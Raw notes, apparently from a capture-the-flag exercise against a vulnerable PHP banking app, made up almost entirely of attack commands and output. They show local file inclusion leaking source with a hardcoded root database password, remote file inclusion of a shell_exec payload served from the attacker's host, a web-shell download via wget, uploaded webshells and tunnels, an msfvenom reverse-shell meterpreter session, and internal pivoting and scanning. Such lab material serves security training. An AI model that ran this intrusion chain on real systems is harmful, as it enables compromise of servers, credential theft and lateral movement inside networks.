    <style type="text/css">
        body{ font: 14px sans-serif; }
        .wrapper{ width: 350px; padding: 20px; }
    </style>
</head>
<body>
<h1>Harbor Bank Online</h1>
<nav class="navbar navbar-default">
  <div class="container-fluid">
    <div class="navbar-header">
      <a class="navbar-brand" href="#"></a>
    </div>
    <ul class="nav navbar-nav">
      <li class="active"><a href="#">Home</a></li>
      <li><a href="index.php?p=balance">Balance</a></li>
      <li><a href="index.php?p=transfer">Transfers</a></li>
      <li><a href="index.php?p=account">My Account</a></li>
      <li><a href="index.php?p=about">About</a></li>
      <li><a href="index.php?p=logout" onclick="confirm('Are you sure you want to log out?')">Log Out</a></li>
    </ul>
  </div>
</nav>
<div align="center">
<h4>Welcome, <?php echo $_SESSION["username"]; ?>.</h4>
<body>Use the menu above to perform your online banking.</body>
</div>


===========================================================
Source code of the pages TRANSFER and ACCOUNT
===========================================================

jeff@kali:~/Documents/CTFs/SafeHarbor$ wget -qO- --no-cookies --header "Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9" http://192.168.1.36/OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=transfer > SourceCodePageTransferEncoded.txt

---------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ base64 -d SourceCodePageTransferEncoded.txt 
<?php

session_start();

if(is_null($_SESSION["loggedin"])){
        header("Location: /");
}

$dbServer = mysqli_connect('mysql','root','TestPass123!', 'HarborBankUsers');
$user = $_SESSION["username"];

if($_POST['x']){
        $recipient = $_POST['recipient'];
        $amount = $_POST['amount'];
        $currentBalanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users where username = '$user'");
        $balanceRow = mysqli_fetch_row($currentBalanceQueryResult);
        $balance = $balanceRow[0];

        if($amount > 0 && $recipient != "Recipient"){

                if($balance > $amount){
                        $recipientBalanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users where username = '$recipient'");
                        $recipientBalanceRow = mysqli_fetch_row($recipientBalanceQueryResult);
                        $recipientBalance = $recipientBalanceRow[0];

                        $recipientNewBalance = $recipientBalance + $amount;
                        $newBalance = $balance - $amount;

                        if($newBalanceDBCommit = mysqli_query($dbServer, "UPDATE users SET balance = '$newBalance' WHERE username = '$user'") && $recipientNewBalanceCommit = mysqli_query($dbServer, "UPDATE users SET balance = '$recipientNewBalance' WHERE username = '$recipient'")){
                                echo "<script type='text/javascript'>alert('Transfer Complete.');</script>";
                        }else{
                                echo "<script type = 'text/javascript'>alert('Transfer Error. Could not complete.');</script>";

                            }

                }else{
                                echo "<script type = 'text/javascript'>alert('Insufficient Funds for Transfer. Transaction incomplete.');</script>";
                }

        }else{
                                echo "<script type = 'text/javascript'>alert('Check recipient and amount and try again.');</script>";
        }
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Harbor Bank Online</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
    <style type="text/css">
        .wrapper{ width: 350px; padding: 20px; margin: 0 auto;}
    </style>
</head>
<body>
<h1>Harbor Bank Online</h1>
<nav class="navbar navbar-default">
  <div class="container-fluid">
    <div class="navbar-header">
      <a class="navbar-brand" href="#"></a>
    </div>
    <ul class="nav navbar-nav">
      <li><a href="index.php?p=welcome">Home</a></li>
      <li><a href="index.php?p=balance">Balance</a></li>
      <li class="active"><a href="index.php?p=transfer">Transfers</a></li>
      <li><a href="index.php?p=account">My Account</a></li>
      <li><a href="index.php?p=about">About</a></li>
      <li><a href="index.php?p=logout" onclick="confirm('Are you sure you want to log out?')">Log Out</a></li>
    </ul>
  </div>
</nav>
<div class="wrapper" align="center">
<h4>Make a Transfer:</h4>
<body>
 <br></br>
 <br></br>
  <form action="" method="post">
   <div class="form-group">
    <select class="form-control" name="recipient" placeholder="Recipient">
     <option>Recipient</option>
     <option>Admin</option>
     <option>Bill</option>
     <option>Steve</option>
     <option>Timothy</option>
     <option>Jill</option>
     <option>Quinten</option>
    </select>
    <br></br>
    <input class="form-control" type="number" placeholder="Amount" name="amount" step=".01">
    <br></br>
    <input type="submit" class="btn btn-primary" value="Submit" name="x">
   </div>
  </form>
</body>

------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ wget -qO- --no-cookies --header "Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9" http://192.168.1.36/OnlineBanking/index.php?p=php://filter/convert.base64-encode/resource=account > SourceCodePageAccountEncoded.txt

------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ base64 -d SourceCodePageAccountEncoded.txt 
<?php

session_start();

if(is_null($_SESSION["loggedin"])){
        header("Location: /");
}


$dbServer = mysqli_connect('mysql','root','TestPass123!', 'HarborBankUsers');
$user = $_SESSION["username"];

if($_POST['x']){
        $oldPass = mysqli_real_escape_string($dbServer, $_POST['oldpass']);
        $newPass = mysqli_real_escape_string($dbServer, $_POST['newpass']);
        $currentPassQueryResult = mysqli_query($dbServer, "SELECT password FROM users where username = '$user'");
        $currentPassRow = mysqli_fetch_row($currentPassQueryResult);
        $currentPass = $currentPassRow[0];

        if($oldPass == $currentPass){

                        if($passUpdateQuery = mysqli_query($dbServer, "UPDATE users SET password = '$newPass' WHERE username = '$user'")){
                                echo "<script type='text/javascript'>alert('Password updated. Please log back in.');</script>"; 
                                echo "<script type='text/javascript'>window.location = '/login.php';</script>";
                                session_destroy();
                        }else{
                                echo "<script type = 'text/javascript'>alert('DB Error. Idk, I'm not an expert.');</script>";

                            }

        }else{
                echo "<script type = 'text/javascript'>alert('Current password validation failed. Password unchanged.');</script>";

        }

}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Harbor Bank Online</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
    <style type="text/css">
        .wrapper{ width: 350px; padding: 20px; margin: 0 auto;}
    </style>
</head>
<body>
<h1>Harbor Bank Online</h1>
<nav class="navbar navbar-default">
  <div class="container-fluid">
    <div class="navbar-header">
      <a class="navbar-brand" href="#"></a>
    </div>
    <ul class="nav navbar-nav">
      <li><a href="index.php?p=welcome">Home</a></li>
      <li><a href="index.php?p=balance">Balance</a></li>
      <li><a href="index.php?p=transfer">Transfers</a></li>
      <li class="active"><a href="index.php?p=account">My Account</a></li>
      <li><a href="index.php?p=about">About</a></li>
      <li><a href="index.php?p=logout" onclick="confirm('Are you sure you want to log out?')">Log Out</a></li>
    </ul>
  </div>
</nav>
<div class="wrapper" align="center">
<h4>Change Account</h4>
<body>
 <br></br>
 <br></br>
  <form action="" method="post">
   <div class="form-group">
     <input class="form-control" type="text" placeholder="<?php echo $user ?>" readonly>
    <br></br>
    <input class="form-control" type="password" placeholder="Old Password" name="oldpass">
    <br></br>
    <input class="form-control" type="password" placeholder="New Password" name="newpass">
    <br></br>
    <input type="submit" class="btn btn-primary" value="Submit" name="x">
   </div>
  </form>
</body>


other
------
GET /OnlineBanking/index.php?p=php://filter/read=convert.base64-encode/resource=balance HTTP/1.1
Host: 192.168.1.36
Accept: */*
Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9
Connection: close

<?php
session_start();
session_destroy();
header("Location: /")
?><?php
session_start();

if(is_null($_SESSION["loggedin"])){
	header("Location: /");
}


$dbServer = mysqli_connect('mysql', 'root', 'TestPass123!', 'HarborBankUsers');
$user = $_SESSION["username"];
$balanceQueryResult = mysqli_query($dbServer, "SELECT balance FROM users WHERE username = '$user'");
$balanceRow = mysqli_fetch_row($balanceQueryResult);
$balance = $balanceRow[0];
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Harbor Bank Online</title>
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.css">
    <style type="text/css">
        body{ font: 14px sans-serif; }
        .wrapper{ width: 350px; padding: 20px; }
    </style>
</head>
<body>
<h1>Harbor Bank Online</h1>
<nav class="navbar navbar-default">
  <div class="container-fluid">
    <div class="navbar-header">
      <a class="navbar-brand" href="#"></a>
    </div>
    <ul class="nav navbar-nav">
      <li><a href="index.php?p=welcome">Home</a></li>
      <li class="active"><a href="index.php?p=balance">Balance</a></li>
      <li><a href="index.php?p=transfer">Transfers</a></li>
      <li><a href="index.php?p=account">My Account</a></li>
      <li><a href="index.php?p=about">About</a></li>
      <li><a href="index.php?p=logout" onclick="confirm('Are you sure you want to log out?')">Log Out</a></li>
    </ul>
  </div>
</nav>
<div align="center">
<h4>Your current account balance is $<?php echo $balance; ?></h4>
<body>If you would like to make a deposit, please call (555) 867-5309</body>
</div>


------------Test wrapper ZIP-------------------

POST /OnlineBanking/index.php?p=zip://var/www/html/file.zip%23about.php HTTP/1.1
Host: 192.168.1.36
Accept: */*
Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9
Content-Length: 46
Connection: close

<?php echo'Vulnerable';?>


HTTP/1.1 200 OK
Server: nginx/1.17.4
Date: Thu, 23 Apr 2020 01:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/7.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 825

<br />
<b>Warning</b>:  include(): Unable to find the wrapper &quot;zip&quot; - did you forget to enable it when you configured PHP? in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />
<br />
<b>Warning</b>:  include(): Unable to find the wrapper &quot;zip&quot; - did you forget to enable it when you configured PHP? in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />
<br />
<b>Warning</b>:  include(zip://var/www/html/file.zip#about.php.php): failed to open stream: No such file or directory in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'zip://var/www/html/file.zip#about.php.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />


------------Test wrapper PHAR-------------------

POST /OnlineBanking/index.php?p=phar://var/www/html/about HTTP/1.1
Host: 192.168.1.36
Accept: */*
Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9
Content-Length: 25
Connection: close

<?php echo'Vulnerable';?>


HTTP/1.1 200 OK
Server: nginx/1.17.4
Date: Thu, 23 Apr 2020 01:56:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 452

<br />
<b>Warning</b>:  include(phar://var/www/html/about.php): failed to open stream: phar error: invalid url or non-existent phar &quot;phar://var/www/html/about.php&quot; in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'phar://var/www/html/about.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />




=========================================================================================================
Remote File Include
=========================================================================================================

jeff@kali:~/Documents/CTFs/SafeHarbor$ echo "<?php echo shell_exec('uname;whoami;id;pwd;ls');?>" > about

jeff@kali:~/Documents/CTFs/SafeHarbor$ echo "<?php echo shell_exec('uname;whoami;id;pwd;ls');?>" > about.php

jeff@kali:~/Documents/CTFs/SafeHarbor$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...


---------------------------

GET /OnlineBanking/index.php?p=http://192.168.1.22:8000/about.php HTTP/1.1
Host: 192.168.1.36
Accept: */*
Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9
Connection: close


HTTP/1.1 200 OK
Server: nginx/1.17.4
Date: Thu, 23 Apr 2020 01:32:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 434

<br />
<b>Warning</b>:  include(http://192.168.1.22:8000/about.php.php): failed to open stream: HTTP request failed! HTTP/1.0 404 File not found
 in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'http://192.168.1.22:8000/about.php.php' for inclusion (include_path='.:/usr/local/lib/php') in <b>/var/www/html/OnlineBanking/index.php</b> on line <b>13</b><br />

-----------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.36 - - [23/Apr/2020 03:32:03] "GET /about.php.php HTTP/1.0" 404 -


-----------------------------------------

GET /OnlineBanking/index.php?p=http://192.168.1.22:8000/about HTTP/1.1
Host: 192.168.1.36
Accept: */*
Cookie: PHPSESSID=33afe821f7ee2c9ccc994a35e6c332b9
Connection: close

HTTP/1.1 200 OK
Server: nginx/1.17.4
Date: Thu, 23 Apr 2020 01:34:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.2.7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 190

Linux
www-data
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/var/www/html/OnlineBanking
about.php
account.php
balance.php
index.php
logout.php
transfer.php
welcome.php

-----------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.36 - - [23/Apr/2020 03:32:03] "GET /about.php.php HTTP/1.0" 404 -
192.168.1.36 - - [23/Apr/2020 03:34:08] "GET /about.php HTTP/1.0" 200 -


jeff@kali:~/Documents/CTFs/SafeHarbor$ cat about.php 
<?php echo shell_exec('uname;whoami;id;pwd;ls');?>


other
<?php system('wget http://x.x.x.x/php-shell.php -O /var/www/html/shell.php'); ?>

------------------------------------------

jeff@kali:~/Documents/CTFs/SafeHarbor$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.36 - - [01/May/2020 02:39:26] code 404, message File not found
192.168.1.36 - - [01/May/2020 02:39:26] "GET /welcome.php HTTP/1.0" 404 -
192.168.1.36 - - [01/May/2020 02:40:13] "GET /welcome.php HTTP/1.0" 200 -
192.168.1.36 - - [01/May/2020 02:40:27] "GET /welcome.php HTTP/1.0" 200 -

http://192.168.1.36/OnlineBanking/index.php?p=http://192.168.1.22:8000/welcome

$ hostname
707af7b0d61f

$ uname -a
Linux 707af7b0d61f 4.15.0-99-generic #100-Ubuntu SMP Wed Apr 22 20:32:56 UTC 2020 x86_64 Linux

$ ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:14:00:07  
          inet addr:172.20.0.7  Bcast:172.20.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:139 errors:0 dropped:0 overruns:0 frame:0
          TX packets:106 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:42213 (41.2 KiB)  TX bytes:14393 (14.0 KiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:225 (225.0 B)  TX bytes:225 (225.0 B)


$ pwd;ls -al
/var/www/html/OnlineBanking
total 36
drwxr-xr-x    2 root     root          4096 Oct  6  2019 .
drwxr-xr-x    1 root     root          4096 Oct  6  2019 ..
-rw-rw-r--    1 root     root          1294 Oct  4  2019 about.php
-rw-rw-r--    1 root     root          2939 Oct  4  2019 account.php
-rw-rw-r--    1 root     root          1555 Oct  4  2019 balance.php
-rw-rw-r--    1 root     root           363 Oct  4  2019 index.php
-rw-rw-r--    1 root     root            66 Oct  4  2019 logout.php
-rw-rw-r--    1 root     root          3636 Oct  4  2019 transfer.php
-rw-rw-r--    1 root     root          1222 Oct  4  2019 welcome.php


$ cat /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
www-data:x:82:82:Linux User,,,:/home/www-data:/bin/false


$ ps -ealf
PID   USER     TIME   COMMAND
    1 root       0:00 php-fpm: master process (/usr/local/etc/php-fpm.conf)
    6 www-data   0:00 php-fpm: pool www
    7 www-data   0:00 php-fpm: pool www
   29 www-data   0:00 sh -c exec 2>&1; ps -ealf
   30 www-data   0:00 ps -ealf

$ ls -al /var/run/docker.sock
ls: /var/run/docker.sock: No such file or directory

$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
tcp        0      0 127.0.0.11:33701        0.0.0.0:*               LISTEN      
tcp        0      0 :::9000                 :::*                    LISTEN      
tcp        8      0 ::ffff:172.20.0.7:9000  ::ffff:172.20.0.6:60454 ESTABLISHED 
udp        0      0 127.0.0.11:55108        0.0.0.0:*                           
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  3      [ ]         STREAM     CONNECTED      26656 
unix  3      [ ]         STREAM     CONNECTED      26655 

$ which nc
/usr/bin/nc

$ arp -a
harborbank_apache_v2_1.harborbank_backend (172.20.0.4) at 02:42:ac:14:00:04 [ether]  on eth0
harborbank_apache_v2_2.harborbank_backend (172.20.0.5) at 02:42:ac:14:00:05 [ether]  on eth0
? (172.20.0.1) at 02:42:40:d6:fe:e7 [ether]  on eth0
harborbank_mysql_1.harborbank_backend (172.20.0.138) at 02:42:ac:14:00:8a [ether]  on eth0
harborbank_apache_1.harborbank_backend (172.20.0.6) at 02:42:ac:14:00:06 [ether]  on eth0

$ wget http://172.20.0.4
Connecting to 172.20.0.4 (172.20.0.4:80)
wget: can't open 'index.html': Permission denied

$ wget http://172.20.0.5
Connecting to 172.20.0.5 (172.20.0.5:80)
wget: can't open 'index.html': Permission denied

$ nc -zv  172.20.0.4 80
172.20.0.4 (172.20.0.4:80) open

$ nc -zv  172.20.0.5 80
172.20.0.5 (172.20.0.5:80) open

$ nc -zv  172.20.0.6 80
172.20.0.6 (172.20.0.6:80) open

$ nc -zv  172.20.0.138 3306
172.20.0.138 (172.20.0.138:3306) open


-----------------------


upload of our webshell in /tmp/
☺ : Uploaded file /tmp//welcome.php (7205 bytes)

=> http://192.168.1.36/OnlineBanking/index.php?p=/tmp/welcome


upload of ReGeog webshell 'tunnel.nosocket.php' in /tmp/
☺ : Uploaded file /tmp//transfer.php (5974 bytes)


jeff@kali:~/Documents/Tools/reGeorg-master$ sudo python2 reGeorgSocksProxy.py -p 8080 -u http://192.168.1.36/OnlineBanking/index.php?p=/tmp/balance
_____                                                                                                                                                                               
  _____   ______  __|___  |__  ______  _____  _____   ______                                                                                                                                             
 |     | |   ___||   ___|    ||   ___|/     \|     | |   ___|                                                                                                                                            
 |     \ |   ___||   |  |    ||   ___||     ||     \ |   |  |                                                                                                                                            
 |__|\__\|______||______|  __||______|\_____/|__|\__\|______|                                                                                                                                            
                    |_____|                                                                                                                                                                              
                    ... every office needs a tool like Georg                                                                                                                                             
                                                                                                                                                                                                         
  willem@sensepost.com / @_w_m__                                                                                                                                                                         
  sam@sensepost.com / @trowalts                                                                                                                                                                          
  etienne@sensepost.com / @kamp_staaldraad                                                                                                                                                               
                                                                                                                                                                                                         
   
[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:8080], tunnel at [http://192.168.1.36/OnlineBanking/index.php?p=/tmp/balance]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg is not ready, please check url


-----------Neo-ReGeorg------------------

jeff@kali:~/Documents/Tools$ wget https://github.com/L-codes/Neo-reGeorg/archive/master.zip
jeff@kali:~/Documents/Tools$ unzip master.zip 


jeff@kali:~/Documents/Tools/Neo-reGeorg-master$ sudo python2 neoreg.py -p 8080 -u http://192.168.1.36/OnlineBanking/index.php?p=/tmp/balance --cookie "PHPSESSID: 1e3be245fdfc1d5289f8962e2816636d" -k password


          "$$$$$$''  'M$  '$$$@m
        :$$$$$$$$$$$$$$''$$$$'
       '$'    'JZI'$$&  $$$$'
                 '$$$  '$$$$
                 $$$$  J$$$$'
                m$$$$  $$$$,
                $$$$@  '$$$$_          Neo-reGeorg
             '1t$$$$' '$$$$<
          '$$$$$$$$$$'  $$$$          version 1.3.3
               '@$$$$'  $$$$'
                '$$$$  '$$$@
             'z$$$$$$  @$$$
                r$$$   $$|
                '$$v c$$
               '$$v $$v$$$$$$$$$#
               $$x$$$$$$$$$twelve$$$@$'
             @$$$@L '    '<@$$$$$$$$`
           $$                 '$$$


    [ Github ] https://github.com/L-codes/neoreg

+------------------------------------------------------------------------+
  Log Level set to [ERROR]
  Starting socks server [127.0.0.1:8080], tunnel at [http://192.168.1.36/OnlineBanking/index.php?p=/tmp/balance]
+------------------------------------------------------------------------+
[ERROR   ]  Georg is not ready, please check url. rep: [200] OK



jeff@kali:~/Documents/Tools/Neo-reGeorg-master$ python3 neoreg.py -p 8080 -u http://192.168.1.36/OnlineBanking/index.php?p=/tmp/transfer --cookie "PHPSESSID: 1e3be245fdfc1d5289f8962e2816636d" -k password


          "$$$$$$''  'M$  '$$$@m
        :$$$$$$$$$$$$$$''$$$$'
       '$'    'JZI'$$&  $$$$'
                 '$$$  '$$$$
                 $$$$  J$$$$'
                m$$$$  $$$$,
                $$$$@  '$$$$_          Neo-reGeorg
             '1t$$$$' '$$$$<
          '$$$$$$$$$$'  $$$$          version 1.3.3
               '@$$$$'  $$$$'
                '$$$$  '$$$@
             'z$$$$$$  @$$$
                r$$$   $$|
                '$$v c$$
               '$$v $$v$$$$$$$$$#
               $$x$$$$$$$$$twelve$$$@$'
             @$$$@L '    '<@$$$$$$$$`
           $$                 '$$$


    [ Github ] https://github.com/L-codes/neoreg

+------------------------------------------------------------------------+
  Log Level set to [ERROR]
  Starting socks server [127.0.0.1:8080], tunnel at [http://192.168.1.36/OnlineBanking/index.php?p=/tmp/transfer]
+------------------------------------------------------------------------+
[ERROR   ]  Georg is not ready, please check url. rep: [200] OK


jeff@kali:~/Documents/CTFs/SafeHarbor$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.22 LPORT=4242 -f elf > reverseshell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes


☺ : Uploaded file /tmp//reverseshell.elf (152 bytes)


$ chmod +x /tmp/reverseshell.elf 
$cd /tmp/
$ ./reverseshell.elf 

jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo msfconsole
<SNIP>

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x86/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.22     yes       The listen address (an interface may be specified)
   LPORT  4242             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.22:4242 
[*] Sending stage (980808 bytes) to 192.168.1.36
[*] Meterpreter session 1 opened (192.168.1.22:4242 -> 192.168.1.36:55982) at 2020-05-01 04:41:01 +0200

meterpreter > getuid
Server username: no-user @ 707af7b0d61f (uid=82, gid=82, euid=82, egid=82)

meterpreter > run autoroute -h

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s 10.1.1.0 -n 255.255.255.0  # Add a route to 10.10.10.1/255.255.255.0
[*]   run autoroute -s 10.10.10.1                 # Netmask defaults to 255.255.255.0
[*]   run autoroute -s 10.10.10.1/24              # CIDR notation is also okay
[*]   run autoroute -p                            # Print active routing table
[*]   run autoroute -d -s 10.10.10.1              # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
[-] Deprecation warning: This script has been replaced by the post/multi/manage/autoroute module
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0


Interface 21
============
Name         : eth0
Hardware MAC : 02:42:ac:14:00:07
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.20.0.7
IPv4 Netmask : 255.255.0.0

meterpreter > run autoroute -s 172.20.0.0 -n 255.255.0.0

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.20.0.0/255.255.0.0...
[+] Added route to 172.20.0.0/255.255.0.0 via 192.168.1.36
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 1...
msf5 auxiliary(scanner/portscan/tcp) > options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       172.20.0.4-6     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > run

msf5 auxiliary(scanner/portscan/tcp) > run

[+] 172.20.0.4:           - 172.20.0.4:80 - TCP OPEN
[*] 172.20.0.4-6:         - Scanned 1 of 3 hosts (33% complete)
[+] 172.20.0.5:           - 172.20.0.5:80 - TCP OPEN
[*] 172.20.0.4-6:         - Scanned 2 of 3 hosts (66% complete)
[+] 172.20.0.6:           - 172.20.0.6:80 - TCP OPEN
[*] 172.20.0.4-6:         - Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed

msf5 auxiliary(scanner/portscan/tcp) > options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       172.20.0.4-6     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf5 auxiliary(scanner/portscan/tcp) > set PORTS 1-65535
PORTS => 1-65535
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.20.0.138
RHOSTS => 172.20.0.138
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 172.20.0.138:         - 172.20.0.138:3306 - TCP OPEN
[*] 172.20.0.138:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks5

msf5 auxiliary(server/socks5) > options

Module options (auxiliary/server/socks5):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   8080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener

Auxiliary action:
   Name   Description
   ----   -----------
   Proxy  


msf5 auxiliary(server/socks5) > run
[*] Auxiliary module running as background job 0.

[*] Starting the socks5 proxy server



jeff@kali:~/Documents/CTFs/SafeHarbor$ sudo proxychains nmap -Pn -v -sS -sV -n -p 80 172.20.0.4-6
